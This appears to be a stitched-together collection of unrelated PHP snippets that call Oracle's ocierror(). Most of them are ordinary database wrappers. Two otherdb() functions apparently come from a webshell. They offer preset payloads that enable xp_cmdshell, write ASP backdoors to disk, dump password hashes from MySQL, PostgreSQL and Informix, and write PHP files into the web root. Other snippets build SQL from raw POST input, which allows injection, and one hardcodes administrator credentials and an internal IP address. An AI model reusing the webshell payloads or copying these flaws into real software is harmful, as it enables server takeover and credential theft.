function getErrorCode() { if ($err = ocierror($this->_connection)) { return $err['code']; } else { return false; } }
/** * Get a description of the last error * @return String */ public function lastError() { $arr = ocierror(); if (count($arr) > 1) { return $arr["code"] . " - " . $arr["message"]; } return ""; }
/** * Connect to MySQL, but not to a database * * @param string $dbuser Username * @param string $dbpassword Password * @return bool Success * */ public function connect($dbuser = '', $dbpassword = '', $dbname = '') { if (!($this->dbh = oci_new_connect($dbuser, $dbpassword, $dbname))) { $err = ocierror(); $this->register_error($err['message'], $err['code']); return false; } else { $this->clear_errors(); return true; } }
function add_image($name, $imagetype, $file) { if (!is_null($file)) { if ($file["error"] != 0 || $file["size"] == 0) { error("Incorrect Image"); } else { if ($file["size"] < 1024 * 1024) { global $DB; $imageid = get_dbid("images", "imageid"); $image = fread(fopen($file["tmp_name"], "r"), filesize($file["tmp_name"])); if ($DB['TYPE'] == "ORACLE") { DBstart(); $lobimage = OCINewDescriptor($DB['DB'], OCI_D_LOB); $stid = OCIParse($DB['DB'], "insert into images (imageid,name,imagetype,image)" . " values ({$imageid}," . zbx_dbstr($name) . "," . $imagetype . ",EMPTY_BLOB())" . " return image into :image"); if (!$stid) { $e = ocierror($stid); error("Parse SQL error [" . $e["message"] . "] in [" . $e["sqltext"] . "]"); return false; } OCIBindByName($stid, ':image', $lobimage, -1, OCI_B_BLOB); if (!OCIExecute($stid, OCI_DEFAULT)) { $e = ocierror($stid); error("Execute SQL error [" . $e["message"] . "] in [" . $e["sqltext"] . "]"); return false; } $result = DBend($lobimage->save($image)); if (!$result) { error("Couldn't save image!\n"); return false; } $lobimage->free(); OCIFreeStatement($stid); return $stid; } else { if ($DB['TYPE'] == "POSTGRESQL") { $image = pg_escape_bytea($image); } else { if ($DB['TYPE'] == "SQLITE3") { $image = bin2hex($image); } } } return DBexecute("insert into images (imageid,name,imagetype,image)" . " values ({$imageid}," . zbx_dbstr($name) . "," . $imagetype . "," . zbx_dbstr($image) . ")"); } else { error("Image size must be less than 1Mb"); } } } else { error("Select image to download"); } return false; }
function query_exec($query) { # IMPORT MYSQL PARAMETERS (NOTE: IT WORKS WITH ABSOLUTE PATH ONLY !!) include '../config/registry_oracle_db.php'; # open connection to db //putenv("ORACLE_HOME=/usr/lib/oracle/xe/app/oracle/product/10.2.0"); $conn = OCILogOn($user_db, $password_db, $db) or die("Could not connect to Oracle database!") or die(ocierror()); # execute the EXEC query $statement = ociparse($conn, $query); $risultato = ociexecute($statement); # close connection ocilogoff($conn); $a = 1; return $a; }
function ShowBusy() { global $_SERVER; $errpage = ""; $err = ocierror(); $host = $_SERVER['HTTP_HOST']; $page = $_SERVER['DOCUMENT_ROOT'] . "/error/index.php"; $msg = "Server is currently busy. Please retry again in a few seconds." . "<br><a href=http://{$host}>REFRESH</a>\n<br>" . $err['message'] . "</br>"; if (file_exists($page)) { while (@ob_end_clean()) { } header("location: http://{$host}/error/index.php"); } else { print $msg; } }
/** * Open the connection * @return One_Store_Connection_Oci */ public function open() { $meta = $this->getMeta(); //die($meta['db']['tns'] ); $link = oci_connect($meta['db']['user'], $meta['db']['password'], $meta['db']['tns']); //print_r($link); if (!$link) { //print_r(ocierror()); throw new One_Exception('Not connected : ' . ocierror()); } // Set the proper encoding if needed /* $encoding = $this->getEncoding(); if(null != $encoding) { mysql_query('SET NAMES "'.mysql_real_escape_string('.$encoding.').'"', $link); } */ return $link; }
/** * Fetches all the rows for a select query. Returns FALSE if query failed and * DB_OK for all other queries * * @deprecated * * @param resource $result * @return array All rows in result set */ private function setResult($result) { $GLOBALS['log']->info('call to DBManager::setResult() is deprecated'); if (PEAR::isError($result) === true) { $GLOBALS['log']->error($msg); $result = FALSE; } elseif ($result != DB_OK) { // must be a result $GLOBALS['log']->fatal("setResult:" . print_r($result, true)); $row = array(); $rows = array(); while (ocifetchinto($result, $row, OCI_ASSOC | OCI_RETURN_NULLS | OCI_RETURN_LOBS)) { $err = ocierror($result); if ($err == false) { $rows[] = $row; } else { print_r($err); } } $result = $rows; } $GLOBALS['log']->fatal("setResult: returning rows from setResult"); return $result; }
/* * To change this license header, choose License Headers in Project Properties. * To change this template file, choose Tools | Templates * and open the template in the editor. */ include './config/connect.php'; $delete_flag = TRUE; if (!empty($_POST['items_to_delete'])) { foreach ($_POST['items_to_delete'] as $key) { $sql_delete = "DELETE FROM REPORT_DATA_DEMAND WHERE ID='" . $key . "'"; echo $sql_delete; $sql_delete_parse = ociparse($connect, $sql_delete); $delete_flag = ociexecute($sql_delete_parse); if (!$delete_flag) { ocierror($sql_delete_parse); oci_rollback($connect); break; } } if ($delete_flag) { if ($_GET['before_page'] == 'potensi') { header("Location: delete.sitac.php?witel=" . $_GET['witel'] . "&tipe_site=" . $_GET['tipe_site'] . "&before_page=" . $_GET['before_page'] . "&status_delete=1"); } else { if ($_GET['before_page'] == 'sitac' || $_GET['before_page'] == 'deployment') { header("Location: delete.sitac.php?witel=" . $_GET['witel'] . "&tipe_site=" . $_GET['tipe_site'] . "&before_page=" . $_GET['before_page'] . "&jenis=" . $_GET['jenis'] . "&status_delete=1"); } } } else { header("Location: delete.sitac.php?witel=" . $_GET['witel'] . "&tipe_site=" . $_GET['tipe_site'] . "&before_page=" . $_GET['before_page'] . "&status_delete=0"); }
<?php //page should check if the object coming is null and redirect to index.php $connection = oci_connect("ADMINISTRATOR", "ADMINISTRATOR", "(DESCRIPTION =\n\t\t\t\t\t\t\t\t\t\t\t\t\t (ADDRESS_LIST =\n\t\t\t\t\t\t\t\t\t\t\t\t\t (ADDRESS = (PROTOCOL = TCP)(HOST = 172.26.50.20)(PORT = 1521))\n\t\t\t\t\t\t\t\t\t\t\t\t\t )\n\t\t\t\t\t\t\t\t\t\t\t\t\t (CONNECT_DATA =\n\t\t\t\t\t\t\t\t\t\t\t\t\t (SID = MATCHDB)\n\t\t\t\t\t\t\t\t\t\t\t\t\t (SERVER = DEDICATED)\n\t\t\t\t\t\t\t\t\t\t\t\t\t )\n\t\t\t\t\t\t\t\t\t\t\t\t\t)"); //captures error if (!$connection) { echo "Invalid connection " . var_dump(ocierror()); die; } //gets values from index.php $nickname = $_POST["user"]; $pass = $_POST["password"]; $query = 'INSERT INTO USERNAME (usernameID, usernamePassword) ' . 'VALUES (:nickname, :pass)'; $compiled = oci_parse($connection, $query); oci_bind_by_name($compiled, ':nickname', $nickname); oci_bind_by_name($compiled, ':pass', $pass); oci_execute($compiled, OCI_NO_AUTO_COMMIT); oci_commit($connection); oci_close($connection); echo "You have registered succesfully!";
function connectDB() { include './config/registry_oracle_db.php'; //putenv("ORACLE_HOME=/usr/lib/oracle/xe/app/oracle/product/10.2.0"); # open connection to db $conn = oci_connect($user_db, $password_db, $db); if (!$conn) { $errorcode = array(); $error_message = array(); $errorcode[] = "XDSRegistryError"; $err = ocierror(); $error_message[] = $err['message']; $database_error_response = makeSoapedFailureResponse($error_message, $errorcode); writeTimeFile($_SESSION['idfile'] . "--Registry: database_error_response"); $file_input = $_SESSION['idfile'] . "-database_error_response.xml"; writeTmpFiles($database_error_response, $file_input, true); SendResponseFile($_SESSION['tmp_path'] . $file_input); //SendResponse($database_error_response); exit; } return $conn; }
function DBexecute($query, $skip_error_messages = 0) { global $DB; //COpt::savesqlrequest($query); $result = false; if (isset($DB['DB']) && !empty($DB['DB'])) { $DB['EXECUTE_COUNT']++; // WRONG FOR ORACLE!! //SDI('SQL Exec: '.$query); switch ($DB['TYPE']) { case 'MYSQL': $result = mysql_query($query, $DB['DB']); if (!$result) { error('Error in query [' . $query . '] [' . mysql_error() . ']'); } break; case 'POSTGRESQL': if (!($result = pg_query($DB['DB'], $query))) { error('Error in query [' . $query . '] [' . pg_last_error() . ']'); } break; case 'ORACLE': $stid = OCIParse($DB['DB'], $query); if (!$stid) { $e = @ocierror(); error('SQL error [' . $e['message'] . '] in [' . $e['sqltext'] . ']'); } $result = @OCIExecute($stid, $DB['TRANSACTIONS'] ? OCI_DEFAULT : OCI_COMMIT_ON_SUCCESS); if (!$result) { $e = ocierror($stid); error('SQL error [' . $e['message'] . '] in [' . $e['sqltext'] . ']'); } else { $result = $stid; } break; case 'SQLITE3': if (!$DB['TRANSACTIONS']) { lock_db_access(); } $result = sqlite3_exec($DB['DB'], $query); if (!$result) { error('Error in query [' . $query . '] [' . sqlite3_error($DB['DB']) . ']'); } if (!$DB['TRANSACTIONS']) { unlock_db_access(); } break; } if ($DB['TRANSACTIONS'] && !$result) { $DB['TRANSACTION_STATE'] &= $result; // SDI($query); // SDI($DB['TRANSACTION_STATE']); } } return $result; }
/** * Keeps track of the most recent Oracle error * */ function _setError($source = null, $clear = false) { if ($source) { $e = ocierror($source); } else { $e = ocierror(); } $this->_error = $e['message']; if ($clear) { $this->_error = null; } }
function ErrorMsg() { $e = ocierror(); return is_array($e) ? $e['message'] : ''; }
function ErrorNo() { if (is_resource($this->_stmt)) { $arr = @ocierror($this->_stmt); } else { $arr = @ocierror($this->_connectionID); if ($arr === false) { $arr = @ocierror(); } if ($arr == false) { return ''; } } return $arr['code']; }
function da_sql_error($link, $config) { return ocierror($link); }
/** * This function will connect to the database, execute a query and will return the result handle. * * @param $sql The SQL statement to execute. * * @returns Handle to the result of the query. In case of an error, this function triggers an error. * * @internal */ function &_connectAndExec($sql) { $sql = str_replace(' #_', ' ' . YDConfig::get('YD_DB_TABLEPREFIX', ''), $sql); $this->_logSql($sql); $this->connect(); $stmt = OCIParse($this->_conn, $sql); if (!$stmt) { $error = ocierror($stmt); trigger_error($error['message'], YD_ERROR); } $result = @OCIExecute($stmt); if ($result === false && $this->_failOnError === true) { $error = ocierror($stmt); if (!empty($error['sqltext'])) { $error['message'] .= ' (SQL: ' . $error['sqltext'] . ')'; } trigger_error($error['message'], YD_ERROR); } return $stmt; }
function otherdb() { $db = isset($_GET['db']) ? $_GET['db'] : ''; print <<<END <form method="POST" name="dbform" id="dbform" action="?s=w&db={$db}" enctype="multipart/form-data"> <div class="actall"><a href="?s=w">   psotgresql  </a> <a href="?s=w&db=ms">   mssql  </a> <a href="?s=w&db=ora">   oracle  </a> <a href="?s=w&db=ifx">   informix  </a> <a href="?s=w&db=fb">   firebird  </a> <a href="?s=w&db=db2">  db2  </a></div></form> END; if ($db == "ms") { $mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost'; $msuser = isset($_POST['msuser']) ? $_POST['msuser'] : '******'; $mspass = isset($_POST['mspass']) ? $_POST['mspass'] : '******'; $msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master'; $msaction = isset($_POST['action']) ? $_POST['action'] : ''; $msquery = isset($_POST['mssql']) ? $_POST['mssql'] : ''; $msquery = stripslashes($msquery); print <<<END <form method="POST" name="msform" action="?s=w&db=ms"> <div class="actall">Host:<input type="text" name="mshost" value="{$mshost}" style="width:100px"> User:<input type="text" name="msuser" value="{$msuser}" style="width:100px"> Pass:<input type="text" name="mspass" value="{$mspass}" style="width:100px"> Dbname:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br><br> <script language="javascript"> function msFull(i){ \tStr = new Array(11); Str[0] = ""; \tStr[1] = "select @@version;"; Str[2] = "select name from sysdatabases;"; Str[3] = "select name from sysobject where type='U';"; Str[4] = "select name from syscolumns where id=Object_Id('table_name');"; Str[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');"; \tStr[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');"; \tStr[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;"; Str[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;"; Str[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;"; Str[10] = "Exec master.dbo.xp_cmdshell 'net user';"; Str[11] = "Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';"; \tStr[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' "; msform.mssql.value = Str[i]; \treturn true; } </script> <textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br> <select onchange="return msFull(options[selectedIndex].value)"> \t<option value="0" selected>command</option> <option value="1">version</option> <option value="2">databases</option> <option value="3">tables</option> <option value="4">columns</option> <option value="5">add sp_oacreate</option> \t<option value="6">add xp_cmdshell</option> \t<option value="7">add xp_cmdshell(2005)</option> <option value="8">add sp_oacreate(2005)</option> <option value="9">open openrowset(2005)</option> <option value="10">xp_cmdshell exec</option> <option value="10">sp_oamethod exec</option> <option value="11">sp_makewebtask</option> </select> <input type="hidden" name="action" value="msquery"> <input class="bt" type="submit" value="Query"></div></form> END; if ($msaction == 'msquery') { $msconn = mssql_connect($mshost, $msuser, $mspass); mssql_select_db($msdbname, $msconn) or die("connect error :" . mssql_get_last_message()); $msresult = mssql_query($msquery) or die(mssql_get_last_message()); echo '<font face="verdana">'; echo '<table border="1" cellpadding="1" cellspacing="2">'; echo "\n<tr>\n"; for ($i = 0; $i < mssql_num_fields($msresult); $i++) { echo '<td bgcolor="#228B22"><b>' . mssql_field_name($msresult, $i); echo "</b></td>\n"; } echo "</tr>\n"; mssql_data_seek($result, 0); while ($msrow = mssql_fetch_row($msresult)) { echo "<tr>\n"; for ($i = 0; $i < mssql_num_fields($msresult); $i++) { echo '<td bgcolor="#B8B8E8">'; echo "{$msrow[$i]}"; echo '</td>'; } echo "</tr>\n"; } echo "</table>\n"; echo "</font>"; mssql_free_result($msresult); mssql_close(); } } elseif ($db == "ora") { $orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost'; $oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521'; $orauser = isset($_POST['orauser']) ? $_POST['orauser'] : '******'; $orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '******'; $orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL'; $oraaction = isset($_POST['action']) ? $_POST['action'] : ''; $oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : ''; $oraquery = stripslashes($oraquery); print <<<END <form method="POST" name="oraform" action="?s=w&db=ora"> <div class="actall">Host:<input type="text" name="orahost" value="{$orahost}" style="width:100px"> Port:<input type="text" name="oraport" value="{$oraport}" style="width:50px"> User:<input type="text" name="orauser" value="{$orauser}" style="width:80px"> Pass:<input type="text" name="orapass" value="{$orapass}" style="width:100px"> SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br><br> <script language="javascript"> function oraFull(i){ \tStr = new Array(8); Str[0] = ""; \tStr[1] = "select version();"; Str[2] = "show databases;"; Str[3] = "show tables from db_name;"; Str[4] = "show columns from table_name;"; Str[5] = "select user,password from mysql.user;"; \tStr[6] = "select load_file(0xxxxxxxxxxxxxxxxxxxxx);"; \tStr[7] = "select 0xxxxx from mysql.user into outfile 'c:\\\\inetpub\\\\wwwroot\\\\test.php'"; \toraform.orasql.value = Str[i]; \treturn true; } </script> <textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br> <select onchange="return oraFull(options[selectedIndex].value)"> \t<option value="0" selected>command</option> <option value="1">version</option> <option value="2">databases</option> <option value="3">tables</option> <option value="4">columns</option> <option value="5">hashes</option> \t<option value="6">load_file</option> \t<option value="7">into outfile</option> </select> <input type="hidden" name="action" value="myquery"> <input class="bt" type="submit" value="Query"></div></form> END; if ($oraaction == 'oraquery') { $oralink = OCILogon($orauser, $orapass, "(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST={$orahost})(PORT = {$oraport}))(CONNECT_DATA =(SID={$orasid})))") or die(ocierror()); $oraresult = ociparse($oralink, $oraquery) or die(ocierror()); $orarow = oci_fetch_row($oraresult); echo '<font face="verdana">'; echo '<table border="1" cellpadding="1" cellspacing="2">'; echo "\n<tr>\n"; for ($i = 0; $i < oci_num_fields($oraresult); $i++) { echo '<td bgcolor="#228B22"><b>' . oci_field_name($oraresult, $i); echo "</b></td>\n"; } echo "</tr>\n"; ociresult($oraresult, 0); while ($orarow = ora_fetch_row($oraresult)) { echo "<tr>\n"; for ($i = 0; $i < ora_num_fields($result); $i++) { echo '<td bgcolor="#B8B8E8">'; echo "{$orarow[$i]}"; echo '</td>'; } echo "</tr>\n"; } echo "</table>\n"; echo "</font>"; oci_free_statement($oraresult); ocilogoff(); } } elseif ($db == "ifx") { $ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : '******'; $ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '******'; $ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb'; $ifxaction = isset($_POST['action']) ? $_POST['action'] : ''; $ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : ''; $ifxquery = stripslashes($ifxquery); print <<<END <form method="POST" name="ifxform" action="?s=w&db=ifx"> <div class="actall">Dbname:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px"> User:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px"> Pass:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br><br> <script language="javascript"> function ifxFull(i){ \tStr = new Array(11); Str[0] = ""; \tStr[1] = "select dbservername from sysobjects;"; Str[2] = "select name from sysdatabases;"; Str[3] = "select tabname from systables;"; Str[4] = "select colname from syscolumns where tabid=n;"; Str[5] = "select username,usertype,password from sysusers;"; \tifxform.ifxsql.value = Str[i]; \treturn true; } </script> <textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br> <select onchange="return ifxFull(options[selectedIndex].value)"> \t<option value="0" selected>command</option> <option value="1">dbservername</option> <option value="1">databases</option> <option value="2">tables</option> <option value="3">columns</option> <option value="4">hashes</option> </select> <input type="hidden" name="action" value="ifxquery"> <input class="bt" type="submit" value="Query"></div></form> END; if ($ifxaction == 'ifxquery') { $ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg()); $ifxresult = ifx_query($ifxquery, $ifxlink) or die(ifx_errormsg()); $ifxrow = ifx_fetch_row($ifxresult); echo '<font face="verdana">'; echo '<table border="1" cellpadding="1" cellspacing="2">'; echo "\n<tr>\n"; for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) { echo '<td bgcolor="#228B22"><b>' . ifx_fieldproperties($ifxresult); echo "</b></td>\n"; } echo "</tr>\n"; mysql_data_seek($ifxresult, 0); while ($ifxrow = ifx_fetch_row($ifxresult)) { echo "<tr>\n"; for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) { echo '<td bgcolor="#B8B8E8">'; echo "{$ifxrow[$i]}"; echo '</td>'; } echo "</tr>\n"; } echo "</table>\n"; echo "</font>"; ifx_free_result($ifxresult); ifx_close(); } } elseif ($db == "db2") { $db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost'; $db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000'; $db2user = isset($_POST['db2user']) ? $_POST['db2user'] : '******'; $db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '******'; $db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql'; $db2action = isset($_POST['action']) ? $_POST['action'] : ''; $db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : ''; $db2query = stripslashes($db2query); print <<<END <form method="POST" name="db2form" action="?s=w&db=db2"> <div class="actall">Host:<input type="text" name="db2host" value="{$db2host}" style="width:100px"> Port:<input type="text" name="db2port" value="{$db2port}" style="width:60px"> User:<input type="text" name="db2user" value="{$db2user}" style="width:100px"> Pass:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px"> Dbname:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br><br> <script language="javascript"> function db2Full(i){ \tStr = new Array(4); Str[0] = ""; \tStr[1] = "select schemaname from syscat.schemata;"; Str[2] = "select name from sysibm.systables;"; Str[3] = "select colname from syscat.columns where tabname='table_name';"; Str[4] = "db2 get db cfg for db_name;"; \tdb2form.db2sql.value = Str[i]; \treturn true; } </script> <textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br> <select onchange="return db2Full(options[selectedIndex].value)"> \t<option value="0" selected>command</option> <option value="1">databases</option> <option value="1">tables</option> <option value="2">columns</option> <option value="3">db config</option> </select> <input type="hidden" name="action" value="db2query"> <input class="bt" type="submit" value="Query"></div></form> END; if ($myaction == 'db2query') { //$db2string = "DRIVER={IBM DB2 ODBC DRIVER};DATABASE=$db2dbname;"."HOSTNAME=$db2host;PORT=$db2port;PROTOCOL=TCPIP;UID=$db2user;PWD=$db2pass;"; $db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg()); $db2result = db2_exec($db2link, $db2query) or die(db2_stmt_errormsg()); $db2row = db2_fetch_row($db2result); echo '<font face="verdana">'; echo '<table border="1" cellpadding="1" cellspacing="2">'; echo "\n<tr>\n"; for ($i = 0; $i < db2_num_fields($db2result); $i++) { echo '<td bgcolor="#228B22"><b>' . db2_field_name($db2result); echo "</b></td>\n"; } echo "</tr>\n"; while ($db2row = db2_fetch_row($db2result)) { echo "<tr>\n"; for ($i = 0; $i < db2_num_fields($db2result); $i++) { echo '<td bgcolor="#B8B8E8">'; echo "{$db2row[$i]}"; echo '</td>'; } echo "</tr>\n"; } echo "</table>\n"; echo "</font>"; db2_free_result($db2result); db2_close(); } } elseif ($db == "fb") { $fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost'; $fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : ''; $fbpath = str_replace("\\\\", "\\", $fbpath); $fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : '******'; $fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : '******'; $fbaction = isset($_POST['action']) ? $_POST['action'] : ''; $fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : ''; $fbquery = stripslashes($fbquery); print <<<END <form method="POST" name="fbform" action="?s=w&db=fb"> <div class="actall">Host:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px"> Path:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px"> User:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px"> Pass:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/> <script language="javascript"> function fbFull(i){ \tStr = new Array(5); Str[0] = ""; \tStr[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;"; Str[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';"; Str[3] = "input 'D:\\createtable.sql';"; Str[4] = "shell netstat -an;"; \tfbform.fbsql.value = Str[i]; \treturn true; } </script> <textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br> <select onchange="return fbFull(options[selectedIndex].value)"> \t<option value="0" selected>command</option> <option value="1">tables</option> <option value="2">columns</option> <option value="3">import sql</option> <option value="4">shell</option> </select> <input type="hidden" name="action" value="fbquery"> <input class="bt" type="submit" value="Query"></div></form> END; if ($fbaction == 'fbquery') { $fblink = ibase_connect($fbhost . ':' . $fbpath, $fbuser, $fbpass) or die(ibase_errmsg()); $fbresult = ibase_query($fblink, $fbquery) or die(ibase_errmsg()); echo '<font face="verdana">'; echo '<table border="1" cellpadding="1" cellspacing="2">'; echo "\n<tr>\n"; for ($i = 0; $i < ibase_num_fields($fbresult); $i++) { echo '<td bgcolor="#228B22"><b>' . ibase_field_info($fbresult, $i); echo "</b></td>\n"; } echo "</tr>\n"; ibase_field_info($fbresult, 0); while ($fbrow = ibase_fetch_row($fbresult)) { echo "<tr>\n"; for ($i = 0; $i < ibase_num_fields($fbresult); $i++) { echo '<td bgcolor="#B8B8E8">'; echo "{$fbrow[$i]}"; echo '</td>'; } echo "</tr>\n"; } echo "</table>\n"; echo "</font>"; ibase_free_result($fbresult); ibase_close(); } } else { $pghost = isset($_POST['pghost']) ? $_POST['pghost'] : 'localhost'; $pguser = isset($_POST['pguser']) ? $_POST['pguser'] : '******'; $pgpass = isset($_POST['pgpass']) ? $_POST['pgpass'] : ''; $pgdbname = isset($_POST['pgdbname']) ? $_POST['pgdbname'] : 'postgres'; $pgaction = isset($_POST['action']) ? $_POST['action'] : ''; $pgquery = isset($_POST['pgsql']) ? $_POST['pgsql'] : ''; $pgquery = stripslashes($pgquery); print <<<END <form method="POST" name="pgform" action="?s=w"> <div class="actall">Host:<input type="text" name="pghost" value="{$pghost}" style="width:100px;"> User:<input type="text" name="pguser" vaule="{$pguser}" style="width:100px"> Pass:<input tyoe="text" name="pgpass" value="{$pgpass}" style="width:100px"> Dbname:<input type="text" name="pgdbname" value="{$pgdbname}" style="width:100px"><br><br> <script language="javascript"> function pgFull(i){ \tStr = new Array(7); \tStr[0] = ""; Str[1] = "select version();"; Str[2] = "select datname from pg_database;"; Str[3] = "select relname from pg_stat_user_tables limit 1 offset n;"; Str[4] = "select column_name from information_schema.columns where table_name='xxx' limit 1 offset n;"; Str[5] = "select usename,passwd from pg_shadow;"; \tStr[6] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));"; \tpgform.pgsql.value = Str[i]; \treturn true; } </script> <textarea name="pgsql" style="width:600px;height:200px;">{$pgquery}</textarea><br> <select onchange="return pgFull(options[selectedIndex].value)"> \t<option value="0" selected>command</option> <option value="1">version</option> <option value="2">databases</option> <option value="3">tables</option> <option value="4">columns</option> <option value="5">hashes</option> \t<option value="6">pg_hb.conf</option> </select> <input type="hidden" name="action" value="pgquery"> <input class="bt" type="submit" value="Query"></div></form> END; if ($pgaction == 'pgquery') { $pgconn = pg_connect("host={$pghost} dbname={$pgdbname} user={$pguser} password={$pgpass} ") or die('Could not connect: ' . pg_last_error()); $pgresult = pg_query($pgquery) or die('Query failed: ' . pg_last_error()); $pgrow = pg_fetch_row($pgresult); echo '<font face="verdana">'; echo '<table border="1" cellpadding="1" cellspacing="2">'; echo "\n<tr>\n"; for ($i = 0; $i < pg_num_fields($pgresult); $i++) { echo '<td bgcolor="#228B22"><b>' . pg_field_name($pgresult, $i); echo "</b></td>\n"; } echo "</tr>\n"; pg_result_seek($pgresult, 0); while ($pgrow = pg_fetch_row($pgresult)) { echo "<tr>\n"; for ($i = 0; $i < pg_num_fields($pgresult); $i++) { echo '<td bgcolor="#B8B8E8">'; echo "{$pgrow[$i]}"; echo '</td>'; } echo "</tr>\n"; } echo "</table>\n"; echo "</font>"; pg_free_result($pgresult); pg_close(); } } }
function DBexecute($query, $skip_error_messages = 0) { global $DB; if (!isset($DB['DB']) || empty($DB['DB'])) { return false; } $result = false; $time_start = microtime(true); $DB['EXECUTE_COUNT']++; switch ($DB['TYPE']) { case ZBX_DB_MYSQL: if (!($result = mysql_query($query, $DB['DB']))) { error('Error in query [' . $query . '] [' . mysql_error() . ']'); } break; case ZBX_DB_POSTGRESQL: if (!($result = (bool) pg_query($DB['DB'], $query))) { error('Error in query [' . $query . '] [' . pg_last_error() . ']'); } break; case ZBX_DB_ORACLE: if (!($result = OCIParse($DB['DB'], $query))) { $e = @ocierror(); error('SQL error [' . $e['message'] . '] in [' . $e['sqltext'] . ']'); } elseif (!@OCIExecute($result, $DB['TRANSACTIONS'] ? OCI_DEFAULT : OCI_COMMIT_ON_SUCCESS)) { $e = ocierror($result); error('SQL error [' . $e['message'] . '] in [' . $e['sqltext'] . ']'); } else { $result = true; // function must return boolean } break; case ZBX_DB_DB2: if (!($result = db2_prepare($DB['DB'], $query))) { $e = @db2_stmt_errormsg($result); error('SQL error [' . $query . '] in [' . $e . ']'); } elseif (true !== @db2_execute($result)) { $e = @db2_stmt_errormsg($result); error('SQL error [' . $query . '] in [' . $e . ']'); } else { $result = true; // function must return boolean } break; case ZBX_DB_SQLITE3: if ($DB['TRANSACTIONS'] == 0) { lock_sqlite3_access(); } if (!($result = $DB['DB']->exec($query))) { error('Error in query [' . $query . '] Error code [' . $DB['DB']->lastErrorCode() . '] Message [' . $DB['DB']->lastErrorMsg() . ']'); } if ($DB['TRANSACTIONS'] == 0) { unlock_sqlite3_access(); } break; } if ($DB['TRANSACTIONS'] != 0 && !$result) { $DB['TRANSACTION_NO_FAILED_SQLS'] = false; } CProfiler::getInstance()->profileSql(microtime(true) - $time_start, $query); return (bool) $result; }
function otherdb() { $db = isset($_GET['db']) ? $_GET['db'] : 'ms'; print <<<END <form method="POST" name="dbform" id="dbform" action="?s=gg&db={$db}" enctype="multipart/form-data"> <div class="actall"> <a href="?s=gg&db=ms">   MSSQL  </a> <a href="?s=gg&db=ora">   Oracle  </a> <a href="?s=gg&db=ifx">   InforMix  </a> <a href="?s=gg&db=fb">   FireBird  </a> <a href="?s=gg&db=db2">  DB2  </a></div></form> END; if ($db == "ms") { $mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost'; $msuser = isset($_POST['msuser']) ? $_POST['msuser'] : '******'; $mspass = isset($_POST['mspass']) ? $_POST['mspass'] : ''; $msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master'; $msaction = isset($_POST['action']) ? $_POST['action'] : ''; $msquery = isset($_POST['mssql']) ? $_POST['mssql'] : ''; $msquery = stripslashes($msquery); print <<<END <div class="actall"> <form method="POST" name="msform" action="?s=gg&db=ms"> Host:<input type="text" name="mshost" value="{$mshost}" style="width:100px"> User:<input type="text" name="msuser" value="{$msuser}" style="width:100px"> Pass:<input type="text" name="mspass" value="{$mspass}" style="width:100px"> Dbname:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br> <script language="javascript"> function msFull(i){ \tStr = new Array(11); \tStr[0] = ""; 